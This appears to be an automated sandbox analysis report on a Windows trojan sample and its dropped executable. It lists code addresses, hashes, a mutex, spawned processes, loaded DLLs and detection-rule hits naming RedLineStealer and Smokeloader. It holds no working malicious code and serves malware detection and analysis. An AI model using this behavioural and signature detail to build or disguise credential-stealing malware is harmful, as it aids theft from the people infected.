                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024C2605
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004071AB0_2_004071AB
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004373D90_2_004373D9
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004274840_2_00427484
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004285600_2_00428560
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0043D6780_2_0043D678
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004166AF0_2_004166AF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004137250_2_00413725
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040E9740_2_0040E974
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042EAE00_2_0042EAE0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00418AAF0_2_00418AAF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00436CBF0_2_00436CBF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00413F0B0_2_00413F0B
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024EED470_2_024EED47
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D41720_2_024D4172
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024E76EB0_2_024E76EB
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024ED7550_2_024ED755
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024E87C70_2_024E87C7
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024CEBDB0_2_024CEBDB
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D69160_2_024D6916
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D398C0_2_024D398C
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F6F260_2_024F6F26
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D8D160_2_024D8D16
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040B44C3_2_0040B44C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004087903_2_00408790
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004260543_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043B0683_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004140703_2_00414070
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043C0203_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004398303_2_00439830
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D8303_2_0043D830
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041B0E13_2_0041B0E1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041F0E03_2_0041F0E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004210E03_2_004210E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004358903_2_00435890
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004340983_2_00434098
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D0A03_2_0043D0A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004180A93_2_004180A9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040A9403_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041714B3_2_0041714B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040C9173_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B12C3_2_0042B12C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042F1303_2_0042F130
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B1C03_2_0042B1C0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041D9E03_2_0041D9E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004361E03_2_004361E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004111E53_2_004111E5
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004059F03_2_004059F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004239F23_2_004239F2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043C1F03_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040F9FD3_2_0040F9FD
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004259903_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043B9A13_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004062503_2_00406250
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041D2703_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00424A743_2_00424A74
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004092303_2_00409230
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00423A343_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004192DA3_2_004192DA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D2F03_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043C2803_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004152983_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004082AE3_2_004082AE
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004252BA3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041CB053_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00428BC03_2_00428BC0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004143C23_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00402BD03_2_00402BD0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00428BE93_2_00428BE9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004373993_2_00437399
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004393A03_2_004393A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00416BA53_2_00416BA5
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004293AA3_2_004293AA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004223B83_2_004223B8
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00436C003_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004234103_2_00423410
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00404CB03_2_00404CB0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004074B03_2_004074B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041DD503_2_0041DD50
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004185783_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042D57E3_2_0042D57E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004245023_2_00424502
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00421D103_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040DD253_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041D5E03_2_0041D5E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004175823_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D5803_2_0043D580
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00427DA23_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004205B03_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C64A3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00426E503_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B4F73_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043462A3_2_0043462A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004356303_2_00435630
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004066E03_2_004066E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C6E43_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00430EF03_2_00430EF0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004256F93_2_004256F9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00422E933_2_00422E93
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00425E903_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004156A03_2_004156A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041BEA03_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00438EA03_2_00438EA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00435EA03_2_00435EA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00405EB03_2_00405EB0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00415F663_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004197703_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004097003_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C7263_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C7353_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041DF803_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00402FA03_2_00402FA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024932073_2_02493207
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CB2CF3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C42FF3_2_024C42FF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A734A3_2_024A734A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AB3483_2_024AB348
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B13473_2_024B1347
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AF3473_2_024AF347
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CD3073_2_024CD307
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024983C73_2_024983C7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB3933_2_024BB393
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BF3973_2_024BF397
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A73B23_2_024A73B2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B80093_2_024B8009
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249C0E83_2_0249C0E8
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C11573_2_024C1157
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B81083_2_024B8108
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C91073_2_024C9107
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C61073_2_024C6107
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024961173_2_02496117
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AE1E73_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AC1AC3_2_024AC1AC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C96073_2_024C9607
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B96113_2_024B9611
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB7633_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024977173_2_02497717
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A87DF3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CD7E73_2_024CD7E7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BD7E53_2_024BD7E5
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A144C3_2_024A144C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C64473_2_024C6447
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB4273_2_024BB427
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AD4D73_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024994973_2_02499497
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024964B73_2_024964B7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A95413_2_024A9541
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CD5573_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AC5283_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024945D73_2_024945D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C5AF73_2_024C5AF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CDA973_2_024CDA97
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C9A973_2_024C9A97
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249CB7E3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B5BF73_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A7BA73_2_024A7BA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249ABA73_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AD8473_2_024AD847
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB75E3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B08173_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C58973_2_024C5897
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C48913_2_024C4891
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BC8B13_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BC94B3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_02496947
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024989F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_02492E37
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_02494F17
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024ADFB7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024ADC47
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_02495C57
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_0249FC64
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_02493C27
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024B4CF4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024B3C9B
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: String function: 024981D7 appears 78 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: String function: 024A42C7 appears 74 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: String function: 024D0987 appears 53 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: String function: 00410720 appears 53 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: String function: 024D0019 appears 121 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: String function: 0040FDB2 appears 125 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612
                  Source: rHrG691f7q.exe | Binary or memory string: OriginalFileName vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe, 00000000.00000003.2183049758.0000000002550000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe, 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Note: the matched rules name two different families (RedLineStealer, Smokeloader) and the report's verdict names a third (LummaC). Both rules fire in the same memory regions of the parent and of the dropped child; memory-scan rules of this kind match on code or string fragments that loaders and stealers share, so family attribution should rest on the extracted configuration and C2 rather than on these hits alone.
                  Source: rHrG691f7q.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 1A68.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@11/5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_009F9F46 CreateToolhelp32Snapshot,Module32First
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7844
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | File created: C:\Users\user\AppData\Local\Temp\1A68.tmp
                  Source: rHrG691f7q.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: rHrG691f7q.exe | ReversingLabs: Detection: 55%
                  Source: rHrG691f7q.exe | Virustotal: Detection: 40%
                  Source: unknown | Process created: C:\Users\user\Desktop\rHrG691f7q.exe "C:\Users\user\Desktop\rHrG691f7q.exe"
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Process created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Process created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe"
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Sections loaded (in order): apphelp.dll, msimg32.dll, wininet.dll, msvcr100.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, uxtheme.dll, propsys.dll, windows.staterepositoryps.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Sections loaded (in order): apphelp.dll, msimg32.dll, msvcr100.dll, windows.storage.dll, wldp.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, ondemandconnroutehelper.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, ondemandconnroutehelper.dll (5 further loads)
